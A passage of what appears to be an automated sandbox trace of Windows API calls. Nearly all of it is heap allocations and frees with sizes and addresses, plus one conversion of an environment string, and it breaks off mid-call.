returned 0x458ae0 [0076.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x458ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0076.038] FreeEnvironmentStringsW (penv=0x458100) returned 1 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x118) returned 0x44aa10 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1f) returned 0x44b290 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2e) returned 0x4498f0 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x31) returned 0x444fa0 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c) returned 0x450720 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x31) returned 0x444fe0 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x14) returned 0x449c20 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x24) returned 0x44b320 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xd) returned 0x443fb0 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1d) returned 0x44b710 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x31) returned 0x445020 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x15) returned 0x445060 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x17) returned 0x444090 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe) returned 0x4425f0 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x69) returned 0x443eb0 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3e) returned 0x450e00 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1d) returned 0x44b7d0 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x48) returned 0x450450 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x443f30 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x18) returned 0x443f50 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1b) returned 0x44b440 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1e) returned 0x44b260 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x29) returned 0x44ba20 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1e) returned 0x44b650 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x6b) returned 0x44ba60 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x17) returned 0x443f70 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xf) returned 0x44bae0 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16) returned 0x448d00 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2a) returned 0x458390 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x29) returned 0x458290 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x448d20 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x21) returned 0x44b740 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16) returned 0x4591c0 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x22) returned 0x44b7a0 [0076.039] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x459100 [0076.039] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458ae0 | out: hHeap=0x440000) returned 1 [0076.040] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xa3a7) returned 0x4593e0 [0076.043] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20) returned 0x44b470 [0076.043] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xa3a7) returned 0x463790 [0076.044] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593e0 | out: hHeap=0x440000) returned 1 [0076.044] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xfef7) returned 0x46db40 [0076.049] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x40) returned 0x450040 [0076.049] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xfef7) returned 0x47da40 [0076.051] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x44b470 | out: hHeap=0x440000) returned 1 [0076.051] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x46db40 | out: hHeap=0x440000) returned 1 [0076.062] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x450) returned 0x458910 [0076.063] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x450) returned 0x48d940 [0076.063] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.063] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1ea7) returned 0x48dda0 [0076.063] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf40) returned 0x4593e0 [0076.064] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x7a0) returned 0x45a330 [0076.064] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48dda0 | out: hHeap=0x440000) returned 1 [0076.064] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593e0 | out: hHeap=0x440000) returned 1 [0076.064] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xbf0) returned 0x4593e0 [0076.064] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.064] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45a330 | out: hHeap=0x440000) returned 1 [0076.064] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x640) returned 0x458910 [0076.065] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1247) returned 0x48d940 [0076.065] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593e0 | out: hHeap=0x440000) returned 1 [0076.065] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.065] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x520) returned 0x458910 [0076.065] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1b56) returned 0x4593e0 [0076.065] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.065] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.065] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8a0) returned 0x48d940 [0076.065] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x28ed) returned 0x45af40 [0076.065] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593e0 | out: hHeap=0x440000) returned 1 [0076.065] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.065] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x550) returned 0x458910 [0076.065] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.065] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2537) returned 0x48d940 [0076.065] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x12b7) returned 0x4593e0 [0076.066] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x950) returned 0x45d840 [0076.066] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.066] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593e0 | out: hHeap=0x440000) returned 1 [0076.066] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x3d4f) returned 0x45e1a0 [0076.067] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45af40 | out: hHeap=0x440000) returned 1 [0076.067] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45d840 | out: hHeap=0x440000) returned 1 [0076.067] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2377) returned 0x48d940 [0076.067] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x11d7) returned 0x461f00 [0076.067] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8e0) returned 0x4593e0 [0076.067] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.068] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x461f00 | out: hHeap=0x440000) returned 1 [0076.068] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593e0 | out: hHeap=0x440000) returned 1 [0076.068] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x5b0) returned 0x458910 [0076.068] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.068] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x640) returned 0x458910 [0076.068] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x5be2) returned 0x46db40 [0076.068] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45e1a0 | out: hHeap=0x440000) returned 1 [0076.069] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.069] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x890) returned 0x48d940 [0076.069] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.069] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xac0) returned 0x48d940 [0076.069] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.069] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20) returned 0x44b920 [0076.069] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x960) returned 0x48d940 [0076.069] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x960) returned 0x48e2b0 [0076.069] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.069] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x460) returned 0x458910 [0076.069] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xe0f) returned 0x48ec20 [0076.069] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48e2b0 | out: hHeap=0x440000) returned 1 [0076.069] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.069] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1c17) returned 0x473730 [0076.069] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xe00) returned 0x48d940 [0076.069] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x700) returned 0x475350 [0076.070] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473730 | out: hHeap=0x440000) returned 1 [0076.070] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.070] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x153d) returned 0x473730 [0076.070] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48ec20 | out: hHeap=0x440000) returned 1 [0076.070] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x475350 | out: hHeap=0x440000) returned 1 [0076.070] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2277) returned 0x48d940 [0076.070] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1157) returned 0x474c80 [0076.070] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8a0) returned 0x475de0 [0076.076] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.076] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x474c80 | out: hHeap=0x440000) returned 1 [0076.076] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1fc7) returned 0x48d940 [0076.076] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473730 | out: hHeap=0x440000) returned 1 [0076.076] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x475de0 | out: hHeap=0x440000) returned 1 [0076.076] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1657) returned 0x473730 [0076.076] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xb20) returned 0x474d90 [0076.076] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x590) returned 0x48f910 [0076.077] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473730 | out: hHeap=0x440000) returned 1 [0076.077] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x474d90 | out: hHeap=0x440000) returned 1 [0076.077] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2f96) returned 0x473730 [0076.077] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.077] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48f910 | out: hHeap=0x440000) returned 1 [0076.077] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2b47) returned 0x4766d0 [0076.077] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x15b7) returned 0x48d940 [0076.078] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xad0) returned 0x48ef00 [0076.078] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4766d0 | out: hHeap=0x440000) returned 1 [0076.078] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.078] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48ef00 | out: hHeap=0x440000) returned 1 [0076.078] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2697) returned 0x4766d0 [0076.078] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1367) returned 0x48d940 [0076.079] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9a0) returned 0x48ecb0 [0076.079] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4766d0 | out: hHeap=0x440000) returned 1 [0076.079] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.079] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x474d) returned 0x4766d0 [0076.079] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473730 | out: hHeap=0x440000) returned 1 [0076.079] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48ecb0 | out: hHeap=0x440000) returned 1 [0076.079] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x920) returned 0x48d940 [0076.079] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.079] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1b47) returned 0x48d940 [0076.079] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xd90) returned 0x47ae30 [0076.080] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x6d0) returned 0x48f490 [0076.080] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.080] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x47ae30 | out: hHeap=0x440000) returned 1 [0076.080] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48f490 | out: hHeap=0x440000) returned 1 [0076.080] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x5d0) returned 0x458910 [0076.080] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x6adf) returned 0x4593e0 [0076.080] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4766d0 | out: hHeap=0x440000) returned 1 [0076.080] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.080] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1887) returned 0x48d940 [0076.080] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc30) returned 0x48f1d0 [0076.081] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x620) returned 0x458910 [0076.081] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.081] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48f1d0 | out: hHeap=0x440000) returned 1 [0076.081] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.081] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8f0) returned 0x48d940 [0076.081] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x480) returned 0x458910 [0076.081] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x240) returned 0x48e240 [0076.081] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.081] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.081] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48e240 | out: hHeap=0x440000) returned 1 [0076.081] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x40) returned 0x450a90 [0076.081] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x44b920 | out: hHeap=0x440000) returned 1 [0076.081] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x46db40 | out: hHeap=0x440000) returned 1 [0076.082] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593e0 | out: hHeap=0x440000) returned 1 [0076.083] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x450a90 | out: hHeap=0x440000) returned 1 [0076.083] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9900) returned 0x4593e0 [0076.084] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1bf0) returned 0x48d940 [0076.087] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.087] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9937) returned 0x46db40 [0076.088] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593e0 | out: hHeap=0x440000) returned 1 [0076.088] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20) returned 0x44b8c0 [0076.088] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9900) returned 0x4593e0 [0076.088] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1bf0) returned 0x48d940 [0076.090] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x48d940 | out: hHeap=0x440000) returned 1 [0076.090] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9937) returned 0x48d940 [0076.091] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4593e0 | out: hHeap=0x440000) returned 1 [0076.092] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x40) returned 0x4508b0 [0076.092] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x44b8c0 | out: hHeap=0x440000) returned 1 [0076.092] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x463790 | out: hHeap=0x440000) returned 1 [0076.092] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x47da40 | out: hHeap=0x440000) returned 1 [0076.093] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x450040 | out: hHeap=0x440000) returned 1 [0076.093] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4593e0 [0076.093] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x477480 [0076.093] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8) returned 0x448d40 [0076.093] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x497280 [0076.094] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x459060 [0076.094] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x448d40 | out: hHeap=0x440000) returned 1 [0076.094] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4aa490 [0076.094] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x18) returned 0x459240 [0076.094] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x459060 | out: hHeap=0x440000) returned 1 [0076.094] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4bd6a0 [0076.095] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20) returned 0x44b920 [0076.095] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x459240 | out: hHeap=0x440000) returned 1 [0076.095] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4d08b0 [0076.095] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x30) returned 0x458610 [0076.095] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x44b920 | out: hHeap=0x440000) returned 1 [0076.095] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4e3ac0 [0076.096] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x4f6cd0 [0076.097] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x48) returned 0x450400 [0076.097] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458610 | out: hHeap=0x440000) returned 1 [0076.097] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x509ee0 [0076.097] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x51d0f0 [0076.098] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1e20080 [0076.099] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x68) returned 0x448d40 [0076.099] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x450400 | out: hHeap=0x440000) returned 1 [0076.099] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1e33290 [0076.099] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1e464a0 [0076.100] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1e596b0 [0076.100] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1e6c8c0 [0076.101] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x98) returned 0x4450b0 [0076.101] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x448d40 | out: hHeap=0x440000) returned 1 [0076.101] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1e7fad0 [0076.101] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1e92ce0 [0076.102] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1ea5ef0 [0076.102] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1eb9100 [0076.103] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1ecc310 [0076.103] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1edf520 [0076.114] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xe0) returned 0x444ce0 [0076.114] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4450b0 | out: hHeap=0x440000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1ef2730 [0076.115] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f20080 [0076.116] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f33290 [0076.116] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f464a0 [0076.117] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f596b0 [0076.117] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f6c8c0 [0076.118] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f7fad0 [0076.118] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1f92ce0 [0076.119] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1fa5ef0 [0076.120] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x150) returned 0x44b0b0 [0076.120] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x444ce0 | out: hHeap=0x440000) returned 1 [0076.120] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1fb9100 [0076.120] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1fcc310 [0076.121] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1fdf520 [0076.121] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x1ff2730 [0076.122] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2005940 [0076.122] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2018b50 [0076.123] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x202bd60 [0076.123] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x203ef70 [0076.123] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2052180 [0076.124] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2065390 [0076.125] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20785a0 [0076.125] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x208b7b0 [0076.126] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x209e9c0 [0076.126] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20b1bd0 [0076.126] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1f8) returned 0x458910 [0076.126] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x44b0b0 | out: hHeap=0x440000) returned 1 [0076.126] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20c4de0 [0076.127] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20d7ff0 [0076.127] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20eb200 [0076.128] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x20fe410 [0076.128] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2120080 [0076.129] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2133290 [0076.130] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x21464a0 [0076.130] RtlAllocateHeap (HeapHandle=0x440000, 